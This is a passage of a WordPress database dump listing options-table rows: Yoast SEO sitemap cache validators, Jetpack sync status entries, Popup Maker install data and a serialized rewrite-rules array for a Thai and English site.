(3111434, 'wpseo_sitemap_6089_cache_validator', '2ANFf', 'no'),
(3157541, 'wpseo_sitemap_6066_cache_validator', '3pmTQ', 'no'),
(3157542, 'wpseo_sitemap_6067_cache_validator', '3pn3S', 'no'),
(3161805, 'wpseo_sitemap_6088_cache_validator', '3pgXC', 'no'),
(3161913, 'wpseo_sitemap_6030_cache_validator', '3vTEn', 'no'),
(3180992, 'wpseo_sitemap_6100_cache_validator', '3yfAr', 'no'),
(3205758, 'wpseo_sitemap_6096_cache_validator', '3pl3s', 'no'),
(3206496, 'wpseo_sitemap_6115_cache_validator', 'go3n', 'no'),
(3229487, 'wpseo_sitemap_6119_cache_validator', '2jhml', 'no'),
(3229591, 'wpseo_sitemap_6138_cache_validator', '92VD', 'no'),
(3229720, 'wpseo_sitemap_6143_cache_validator', '2lAzb', 'no'),
(3229768, 'wpseo_sitemap_6145_cache_validator', '2lVag', 'no'),
(3229807, 'wpseo_sitemap_6147_cache_validator', '2mnKQ', 'no'),
(3229842, 'wpseo_sitemap_6150_cache_validator', '2mPcy', 'no'),
(3229920, 'wpseo_sitemap_6154_cache_validator', '2nDlZ', 'no'),
(3229968, 'wpseo_sitemap_6156_cache_validator', '2nYTO', 'no'),
(3230013, 'wpseo_sitemap_6158_cache_validator', '2oxUe', 'no'),
(3230077, 'wpseo_sitemap_6161_cache_validator', '2p5H1', 'no'),
(3230145, 'wpseo_sitemap_6163_cache_validator', '2psbN', 'no'),
(3237399, 'wpseo_sitemap_6173_cache_validator', 'KcaR', 'no'),
(3237463, 'wpseo_sitemap_6176_cache_validator', 'LHJO', 'no'),
(3238356, 'wpseo_sitemap_popup_theme_cache_validator', '2OHcm', 'no'),
(3247499, 'wpseo_sitemap_6189_cache_validator', '3uy1S', 'no'),
(3255398, 'wpseo_sitemap_6114_cache_validator', '3pqcG', 'no'),
(3255399, 'wpseo_sitemap_6118_cache_validator', '3pqhE', 'no'),
(3277361, 'wpseo_sitemap_6186_cache_validator', '3poFC', 'no'),
(3277362, 'wpseo_sitemap_6187_cache_validator', '3poHx', 'no'),
(3277363, 'wpseo_sitemap_6188_cache_validator', '3poIL', 'no'),
(3293789, 'wpseo_sitemap_6192_cache_validator', '3pgUS', 'no'),
(3302131, 'wpseo_sitemap_6097_cache_validator', '3wndT', 'no'),
(3317170, 'wpseo_sitemap_6209_cache_validator', '3pnTc', 'no'),
(3317952, 'wpseo_sitemap_6213_cache_validator', 'Nuue', 'no'),
(3320013, 'wpseo_sitemap_6222_cache_validator', 'giV4', 'no'),
(3331489, 'wpseo_sitemap_6212_cache_validator', '3pi27', 'no'),
(3335707, 'wpseo_sitemap_6218_cache_validator', '3plky', 'no'),
(3341690, 'wpseo_sitemap_6240_cache_validator', '3pi5I', 'no'),
(3343509, 'wpseo_sitemap_6256_cache_validator', '3OKgk', 'no'),
(3355301, 'wpseo_sitemap_6259_cache_validator', 's6rF', 'no'),
(3356746, 'wpseo_sitemap_6265_cache_validator', '3On9y', 'no'),
(3368671, 'wpseo_sitemap_6268_cache_validator', 'I6Ef', 'no'),
(3369056, 'wpseo_sitemap_6271_cache_validator', 'FIm', 'no'),
(3372563, 'wpseo_sitemap_6255_cache_validator', '3pgKS', 'no'),
(3381034, 'wpseo_sitemap_6264_cache_validator', '3ph1T', 'no'),
(3390942, 'wpseo_sitemap_6275_cache_validator', '28KJI', 'no'),
(3393259, 'wpseo_sitemap_6278_cache_validator', '35NMM', 'no'),
(3400882, 'wpseo_sitemap_6281_cache_validator', '2MI4p', 'no'),
(3404383, 'wpseo_sitemap_6274_cache_validator', '3ph8y', 'no'),
(3406869, 'wpseo_sitemap_6285_cache_validator', 'wu7p', 'no'),
(3407062, 'wpseo_sitemap_6306_cache_validator', 'yko2', 'no'),
(3407124, 'wpseo_sitemap_6308_cache_validator', 'yPnT', 'no'),
(3407176, 'wpseo_sitemap_6310_cache_validator', 'zdLr', 'no'),
(3407224, 'wpseo_sitemap_6312_cache_validator', 'zDZJ', 'no'),
(3407271, 'wpseo_sitemap_6314_cache_validator', 'A2Ar', 'no'),
(3407313, 'wpseo_sitemap_6316_cache_validator', 'An3a', 'no'),
(3407362, 'wpseo_sitemap_6318_cache_validator', 'ANqO', 'no'),
(3407453, 'wpseo_sitemap_6322_cache_validator', 'C1Ps', 'no'),
(3407541, 'wpseo_sitemap_6324_cache_validator', 'DmfN', 'no'),
(3407583, 'wpseo_sitemap_6326_cache_validator', 'DEVn', 'no'),
(3407680, 'wpseo_sitemap_6330_cache_validator', 'EqCW', 'no'),
(3407725, 'wpseo_sitemap_6332_cache_validator', 'EVdm', 'no'),
(3407771, 'wpseo_sitemap_6334_cache_validator', 'FgPs', 'no'),
(3413739, 'jetpack_sync_full__started', '1574498890', 'no'),
(3413740, 'jetpack_sync_full_enqueue_status', 'a:4:{s:9:\"constants\";a:3:{i:0;i:1;i:1;i:0;i:2;b:0;}s:9:\"functions\";a:3:{i:0;i:1;i:1;i:0;i:2;b:0;}s:7:\"options\";a:3:{i:0;i:1;i:1;i:0;i:2;b:0;}s:5:\"users\";b:0;}', 'no'),
(3413741, 'jetpack_sync_full__params', 'a:4:{s:7:\"options\";b:1;s:9:\"functions\";b:1;s:9:\"constants\";b:1;s:5:\"users\";a:1:{i:0;i:0;}}', 'no'),
(3413743, 'jetpack_sync_full__queue_finished', '1574498890', 'yes'),
(3413744, 'jetpack_sync_full_config', 'a:3:{s:9:\"constants\";b:1;s:9:\"functions\";b:1;s:7:\"options\";b:1;}', 'no'),
(3413759, 'jetpack_sync_full__send_started', '1574498896', 'no'),
(3413760, 'jetpack_sync_full__finished', '1574498897', 'no'),
(3430953, 'wpseo_sitemap_6284_cache_validator', '3phNc', 'no'),
(3431051, 'wpseo_sitemap_6344_cache_validator', '3wUsh', 'no'),
(3431117, 'wpseo_sitemap_6348_cache_validator', '3xRlW', 'no'),
(3435234, 'wpseo_sitemap_6354_cache_validator', '3QPML', 'no'),
(3443427, 'wpseo_sitemap_6343_cache_validator', '3pkhC', 'no'),
(3445032, 'jetpack_nonce_1575949477_DigTWsbnlV', '1575949480', 'no'),
(3445034, 'wpseo_sitemap_6351_cache_validator', 'YqPv', 'no'),
(3445070, 'rewrite_rules', 'a:169:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:52:\"(en)/category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:69:\"index.php?lang=$matches[1]&category_name=$matches[2]&feed=$matches[3]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:47:\"(en)/category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:69:\"index.php?lang=$matches[1]&category_name=$matches[2]&feed=$matches[3]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:28:\"(en)/category/(.+?)/embed/?$\";s:63:\"index.php?lang=$matches[1]&category_name=$matches[2]&embed=true\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:40:\"(en)/category/(.+?)/page/?([0-9]{1,})/?$\";s:70:\"index.php?lang=$matches[1]&category_name=$matches[2]&paged=$matches[3]\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:22:\"(en)/category/(.+?)/?$\";s:52:\"index.php?lang=$matches[1]&category_name=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:49:\"(en)/tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:59:\"index.php?lang=$matches[1]&tag=$matches[2]&feed=$matches[3]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:44:\"(en)/tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:59:\"index.php?lang=$matches[1]&tag=$matches[2]&feed=$matches[3]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:25:\"(en)/tag/([^/]+)/embed/?$\";s:53:\"index.php?lang=$matches[1]&tag=$matches[2]&embed=true\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:37:\"(en)/tag/([^/]+)/page/?([0-9]{1,})/?$\";s:60:\"index.php?lang=$matches[1]&tag=$matches[2]&paged=$matches[3]\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:19:\"(en)/tag/([^/]+)/?$\";s:42:\"index.php?lang=$matches[1]&tag=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:50:\"(en)/type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:67:\"index.php?lang=$matches[1]&post_format=$matches[2]&feed=$matches[3]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:58:\"index.php?lang=th&post_format=$matches[1]&feed=$matches[2]\";s:45:\"(en)/type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:67:\"index.php?lang=$matches[1]&post_format=$matches[2]&feed=$matches[3]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:58:\"index.php?lang=th&post_format=$matches[1]&feed=$matches[2]\";s:26:\"(en)/type/([^/]+)/embed/?$\";s:61:\"index.php?lang=$matches[1]&post_format=$matches[2]&embed=true\";s:21:\"type/([^/]+)/embed/?$\";s:52:\"index.php?lang=th&post_format=$matches[1]&embed=true\";s:38:\"(en)/type/([^/]+)/page/?([0-9]{1,})/?$\";s:68:\"index.php?lang=$matches[1]&post_format=$matches[2]&paged=$matches[3]\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:59:\"index.php?lang=th&post_format=$matches[1]&paged=$matches[2]\";s:20:\"(en)/type/([^/]+)/?$\";s:50:\"index.php?lang=$matches[1]&post_format=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:41:\"index.php?lang=th&post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:37:\"(en)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?lang=$matches[1]&&feed=$matches[2]\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:35:\"index.php?lang=th&&feed=$matches[1]\";s:32:\"(en)/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?lang=$matches[1]&&feed=$matches[2]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:35:\"index.php?lang=th&&feed=$matches[1]\";s:13:\"(en)/embed/?$\";s:38:\"index.php?lang=$matches[1]&&embed=true\";s:8:\"embed/?$\";s:29:\"index.php?lang=th&&embed=true\";s:25:\"(en)/page/?([0-9]{1,})/?$\";s:45:\"index.php?lang=$matches[1]&&paged=$matches[2]\";s:20:\"page/?([0-9]{1,})/?$\";s:36:\"index.php?lang=th&&paged=$matches[1]\";s:32:\"(en)/comment-page-([0-9]{1,})/?$\";s:57:\"index.php?lang=$matches[1]&&page_id=160&cpage=$matches[2]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:48:\"index.php?lang=th&&page_id=160&cpage=$matches[1]\";s:7:\"(en)/?$\";s:26:\"index.php?lang=$matches[1]\";s:46:\"(en)/comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:59:\"index.php?lang=$matches[1]&&feed=$matches[2]&withcomments=1\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?lang=th&&feed=$matches[1]&withcomments=1\";s:41:\"(en)/comments/(feed|rdf|rss|rss2|atom)/?$\";s:59:\"index.php?lang=$matches[1]&&feed=$matches[2]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?lang=th&&feed=$matches[1]&withcomments=1\";s:22:\"(en)/comments/embed/?$\";s:38:\"index.php?lang=$matches[1]&&embed=true\";s:17:\"comments/embed/?$\";s:29:\"index.php?lang=th&&embed=true\";s:49:\"(en)/search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:57:\"index.php?lang=$matches[1]&s=$matches[2]&feed=$matches[3]\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:48:\"index.php?lang=th&s=$matches[1]&feed=$matches[2]\";s:44:\"(en)/search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:57:\"index.php?lang=$matches[1]&s=$matches[2]&feed=$matches[3]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:48:\"index.php?lang=th&s=$matches[1]&feed=$matches[2]\";s:25:\"(en)/search/(.+)/embed/?$\";s:51:\"index.php?lang=$matches[1]&s=$matches[2]&embed=true\";s:20:\"search/(.+)/embed/?$\";s:42:\"index.php?lang=th&s=$matches[1]&embed=true\";s:37:\"(en)/search/(.+)/page/?([0-9]{1,})/?$\";s:58:\"index.php?lang=$matches[1]&s=$matches[2]&paged=$matches[3]\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:49:\"index.php?lang=th&s=$matches[1]&paged=$matches[2]\";s:19:\"(en)/search/(.+)/?$\";s:40:\"index.php?lang=$matches[1]&s=$matches[2]\";s:14:\"search/(.+)/?$\";s:31:\"index.php?lang=th&s=$matches[1]\";s:52:\"(en)/author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:67:\"index.php?lang=$matches[1]&author_name=$matches[2]&feed=$matches[3]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:58:\"index.php?lang=th&author_name=$matches[1]&feed=$matches[2]\";s:47:\"(en)/author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:67:\"index.php?lang=$matches[1]&author_name=$matches[2]&feed=$matches[3]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:58:\"index.php?lang=th&author_name=$matches[1]&feed=$matches[2]\";s:28:\"(en)/author/([^/]+)/embed/?$\";s:61:\"index.php?lang=$matches[1]&author_name=$matches[2]&embed=true\";s:23:\"author/([^/]+)/embed/?$\";s:52:\"index.php?lang=th&author_name=$matches[1]&embed=true\";s:40:\"(en)/author/([^/]+)/page/?([0-9]{1,})/?$\";s:68:\"index.php?lang=$matches[1]&author_name=$matches[2]&paged=$matches[3]\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:59:\"index.php?lang=th&author_name=$matches[1]&paged=$matches[2]\";s:22:\"(en)/author/([^/]+)/?$\";s:50:\"index.php?lang=$matches[1]&author_name=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:41:\"index.php?lang=th&author_name=$matches[1]\";s:74:\"(en)/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?lang=$matches[1]&year=$matches[2]&monthnum=$matches[3]&day=$matches[4]&feed=$matches[5]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:88:\"index.php?lang=th&year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:69:\"(en)/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?lang=$matches[1]&year=$matches[2]&monthnum=$matches[3]&day=$matches[4]&feed=$matches[5]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:88:\"index.php?lang=th&year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:50:\"(en)/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:91:\"index.php?lang=$matches[1]&year=$matches[2]&monthnum=$matches[3]&day=$matches[4]&embed=true\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:82:\"index.php?lang=th&year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:62:\"(en)/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:98:\"index.php?lang=$matches[1]&year=$matches[2]&monthnum=$matches[3]&day=$matches[4]&paged=$matches[5]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:89:\"index.php?lang=th&year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:44:\"(en)/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:80:\"index.php?lang=$matches[1]&year=$matches[2]&monthnum=$matches[3]&day=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:71:\"index.php?lang=th&year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:61:\"(en)/([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:81:\"index.php?lang=$matches[1]&year=$matches[2]&monthnum=$matches[3]&feed=$matches[4]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:72:\"index.php?lang=th&year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:56:\"(en)/([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:81:\"index.php?lang=$matches[1]&year=$matches[2]&monthnum=$matches[3]&feed=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:72:\"index.php?lang=th&year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:37:\"(en)/([0-9]{4})/([0-9]{1,2})/embed/?$\";s:75:\"index.php?lang=$matches[1]&year=$matches[2]&monthnum=$matches[3]&embed=true\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:66:\"index.php?lang=th&year=$matches[1]&monthnum=$matches[2]&embed=true\";s:49:\"(en)/([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:82:\"index.php?lang=$matches[1]&year=$matches[2]&monthnum=$matches[3]&paged=$matches[4]\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:73:\"index.php?lang=th&year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:31:\"(en)/([0-9]{4})/([0-9]{1,2})/?$\";s:64:\"index.php?lang=$matches[1]&year=$matches[2]&monthnum=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:55:\"index.php?lang=th&year=$matches[1]&monthnum=$matches[2]\";s:48:\"(en)/([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?lang=$matches[1]&year=$matches[2]&feed=$matches[3]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?lang=th&year=$matches[1]&feed=$matches[2]\";s:43:\"(en)/([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?lang=$matches[1]&year=$matches[2]&feed=$matches[3]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?lang=th&year=$matches[1]&feed=$matches[2]\";s:24:\"(en)/([0-9]{4})/embed/?$\";s:54:\"index.php?lang=$matches[1]&year=$matches[2]&embed=true\";s:19:\"([0-9]{4})/embed/?$\";s:45:\"index.php?lang=th&year=$matches[1]&embed=true\";s:36:\"(en)/([0-9]{4})/page/?([0-9]{1,})/?$\";s:61:\"index.php?lang=$matches[1]&year=$matches[2]&paged=$matches[3]\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:52:\"index.php?lang=th&year=$matches[1]&paged=$matches[2]\";s:18:\"(en)/([0-9]{4})/?$\";s:43:\"index.php?lang=$matches[1]&year=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:34:\"index.php?lang=th&year=$matches[1]\";s:32:\"(en)/.?.+?/attachment/([^/]+)/?$\";s:49:\"index.php?lang=$matches[1]&attachment=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:42:\"(en)/.?.+?/attachment/([^/]+)/trackback/?$\";s:54:\"index.php?lang=$matches[1]&attachment=$matches[2]&tb=1\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:62:\"(en)/.?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:66:\"index.php?lang=$matches[1]&attachment=$matches[2]&feed=$matches[3]\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"(en)/.?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:66:\"index.php?lang=$matches[1]&attachment=$matches[2]&feed=$matches[3]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"(en)/.?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:67:\"index.php?lang=$matches[1]&attachment=$matches[2]&cpage=$matches[3]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"(en)/.?.+?/attachment/([^/]+)/embed/?$\";s:60:\"index.php?lang=$matches[1]&attachment=$matches[2]&embed=true\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:21:\"(en)/(.?.+?)/embed/?$\";s:58:\"index.php?lang=$matches[1]&pagename=$matches[2]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:25:\"(en)/(.?.+?)/trackback/?$\";s:52:\"index.php?lang=$matches[1]&pagename=$matches[2]&tb=1\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:45:\"(en)/(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?lang=$matches[1]&pagename=$matches[2]&feed=$matches[3]\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:40:\"(en)/(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?lang=$matches[1]&pagename=$matches[2]&feed=$matches[3]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:33:\"(en)/(.?.+?)/page/?([0-9]{1,})/?$\";s:65:\"index.php?lang=$matches[1]&pagename=$matches[2]&paged=$matches[3]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:40:\"(en)/(.?.+?)/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?lang=$matches[1]&pagename=$matches[2]&cpage=$matches[3]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:29:\"(en)/(.?.+?)(?:/([0-9]+))?/?$\";s:64:\"index.php?lang=$matches[1]&pagename=$matches[2]&page=$matches[3]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:32:\"(en)/[^/]+/attachment/([^/]+)/?$\";s:49:\"index.php?lang=$matches[1]&attachment=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:42:\"(en)/[^/]+/attachment/([^/]+)/trackback/?$\";s:54:\"index.php?lang=$matches[1]&attachment=$matches[2]&tb=1\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:62:\"(en)/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:66:\"index.php?lang=$matches[1]&attachment=$matches[2]&feed=$matches[3]\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"(en)/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:66:\"index.php?lang=$matches[1]&attachment=$matches[2]&feed=$matches[3]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"(en)/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:67:\"index.php?lang=$matches[1]&attachment=$matches[2]&cpage=$matches[3]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"(en)/[^/]+/attachment/([^/]+)/embed/?$\";s:60:\"index.php?lang=$matches[1]&attachment=$matches[2]&embed=true\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:21:\"(en)/([^/]+)/embed/?$\";s:54:\"index.php?lang=$matches[1]&name=$matches[2]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:25:\"(en)/([^/]+)/trackback/?$\";s:48:\"index.php?lang=$matches[1]&name=$matches[2]&tb=1\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:45:\"(en)/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?lang=$matches[1]&name=$matches[2]&feed=$matches[3]\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:40:\"(en)/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?lang=$matches[1]&name=$matches[2]&feed=$matches[3]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:33:\"(en)/([^/]+)/page/?([0-9]{1,})/?$\";s:61:\"index.php?lang=$matches[1]&name=$matches[2]&paged=$matches[3]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:40:\"(en)/([^/]+)/comment-page-([0-9]{1,})/?$\";s:61:\"index.php?lang=$matches[1]&name=$matches[2]&cpage=$matches[3]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:29:\"(en)/([^/]+)(?:/([0-9]+))?/?$\";s:60:\"index.php?lang=$matches[1]&name=$matches[2]&page=$matches[3]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:21:\"(en)/[^/]+/([^/]+)/?$\";s:49:\"index.php?lang=$matches[1]&attachment=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:31:\"(en)/[^/]+/([^/]+)/trackback/?$\";s:54:\"index.php?lang=$matches[1]&attachment=$matches[2]&tb=1\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:51:\"(en)/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:66:\"index.php?lang=$matches[1]&attachment=$matches[2]&feed=$matches[3]\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:46:\"(en)/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:66:\"index.php?lang=$matches[1]&attachment=$matches[2]&feed=$matches[3]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:46:\"(en)/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:67:\"index.php?lang=$matches[1]&attachment=$matches[2]&cpage=$matches[3]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:27:\"(en)/[^/]+/([^/]+)/embed/?$\";s:60:\"index.php?lang=$matches[1]&attachment=$matches[2]&embed=true\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}', 'yes'),
(3446124, 'pum_installed_on', '2018-01-30 18:17:49', 'yes'),
(3446125, 'pum_previously_opted_using_freemius', '0', 'yes'),
